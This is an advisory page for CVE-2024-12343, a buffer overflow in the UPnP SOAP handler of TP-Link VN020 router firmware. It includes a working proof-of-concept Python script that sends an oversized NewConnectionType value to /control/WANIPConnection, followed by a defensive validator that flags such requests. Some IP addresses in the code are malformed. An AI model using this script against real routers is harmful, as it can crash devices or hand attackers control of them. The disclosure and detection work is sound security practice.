A critical vulnerability (CVE-2024-12343) has been discovered in the TP-Link VN020 F3v(T) TT_V6.2.1021 firmware, which potentially allows attackers to exploit a buffer overflow in an unknown function within the /control/WANIPConnection file. The vulnerability lies in the SOAP Request Handler component and is triggered through manipulation of the argument NewConnectionType. While the attack must be conducted from within the local network, the exploit has already been publicly disclosed, making affected devices a likely target for attackers.

Code Snippet

The following code snippet demonstrates the manipulation of the NewConnectionType argument, which leads to the buffer overflow vulnerability:

import requests

target_IP = "http://192.168..1"            # Replace with the target's IP address
URL = f"{target_IP}/control/WANIPConnection"

headers = {
    "Content-Type": "text/xml",
    "SOAPAction": "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
}

# Oversized NewConnectionType value (600 bytes) that triggers the overflow
oversized_value = "A" * 600

payload = f'''<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewRemoteHost></NewRemoteHost>
      <NewExternalPort>808</NewExternalPort>
      <NewProtocol>TCP</NewProtocol>
      <NewInternalPort>80</NewInternalPort>
      <NewInternalClient>192.168..2</NewInternalClient>
      <NewEnabled>1</NewEnabled>
      <NewPortMappingDescription>test</NewPortMappingDescription>
      <NewLeaseDuration></NewLeaseDuration>
      <NewConnectionType>{oversized_value}</NewConnectionType>
    </m:AddPortMapping>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''

response = requests.post(URL, headers=headers, data=payload)
print(response.text)

Original References

1. CVE-2024-12343 - National Vulnerability Database
2. TP-Link VN020-F3v(T) TT_V6.2.1021 - 'NewConnectionType' Buffer Overflow - Exploit Database

Exploit Details

An attacker must be within the local network to exploit this vulnerability. By manipulating the 'NewConnectionType' argument, an attacker can cause a buffer overflow in the affected TP-Link device. This can lead to a Denial of Service (DoS) condition that leaves the router unresponsive, or could potentially result in the execution of arbitrary code on the router, granting the attacker full control of the device.

TP-Link is advised to release a firmware update that addresses this vulnerability and users are advised to update their devices' firmware as soon as the patch becomes available.
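Until a firmware fix is available, the request can be screened before it reaches the SOAP handler (for example by a gateway, IDS rule or a local proxy in front of the UPnP control endpoint). The following is an added example written for this page, not code from the advisory or from TP-Link: it parses a SOAP body aimed at /control/WANIPConnection and flags any argument whose length is implausible for the service, plus any NewConnectionType value outside the set the UPnP WANIPConnection:1 specification defines. The 64-byte cap and the sample requests are assumptions constructed for the example.

```python
import xml.etree.ElementTree as ET  # use defusedxml in production to resist XML bombs

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WANIP_NS = "urn:schemas-upnp-org:service:WANIPConnection:1"
# ConnectionType values defined by the UPnP WANIPConnection:1 specification.
ALLOWED_CONNECTION_TYPES = {"Unconfigured", "IP_Routed", "IP_Bridged"}
MAX_ARG_LEN = 64  # assumed cap; no legitimate WANIPConnection argument is this long

def check_wanip_request(body: str) -> list[str]:
    """Return findings for one SOAP body sent to /control/WANIPConnection (empty = passed)."""
    findings = []
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return [f"malformed XML: {exc}"]
    soap_body = root.find(f"{{{SOAP_NS}}}Body")
    if soap_body is None:
        return ["missing SOAP Body"]
    for action in soap_body:
        if not action.tag.startswith(f"{{{WANIP_NS}}}"):
            continue  # not a WANIPConnection action; out of scope here
        action_name = action.tag.rsplit("}", 1)[-1]
        for arg in action:
            arg_name = arg.tag.rsplit("}", 1)[-1]  # tolerate namespaced arguments
            value = arg.text or ""
            if len(value) > MAX_ARG_LEN:
                findings.append(f"{action_name}/{arg_name}: oversized value ({len(value)} bytes)")
            if arg_name == "NewConnectionType" and value not in ALLOWED_CONNECTION_TYPES:
                findings.append(f"{action_name}/{arg_name}: unexpected value {value[:12]!r}")
    return findings

def make_add_port_mapping(extra: str = "") -> str:
    """Constructed AddPortMapping request used as sample input (not a real capture)."""
    return f'''<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_NS}">
  <SOAP-ENV:Body>
    <m:AddPortMapping xmlns:m="{WANIP_NS}">
      <NewExternalPort>8080</NewExternalPort>
      <NewProtocol>TCP</NewProtocol>
      <NewInternalPort>80</NewInternalPort>
      <NewInternalClient>192.0.2.10</NewInternalClient>
      <NewPortMappingDescription>test</NewPortMappingDescription>{extra}
    </m:AddPortMapping>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''

# Benign request versus one carrying a 600-byte NewConnectionType, as in the advisory
BENIGN = make_add_port_mapping()
OVERSIZED = make_add_port_mapping("<NewConnectionType>" + "A" * 600 + "</NewConnectionType>")
```

Running check_wanip_request(OVERSIZED) yields two findings (oversized value and unexpected value), while the benign request yields none.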

Timeline

Published on: 12/08/2024 10:15:04 UTC
Last modified on: 12/10/2024 23:26:52 UTC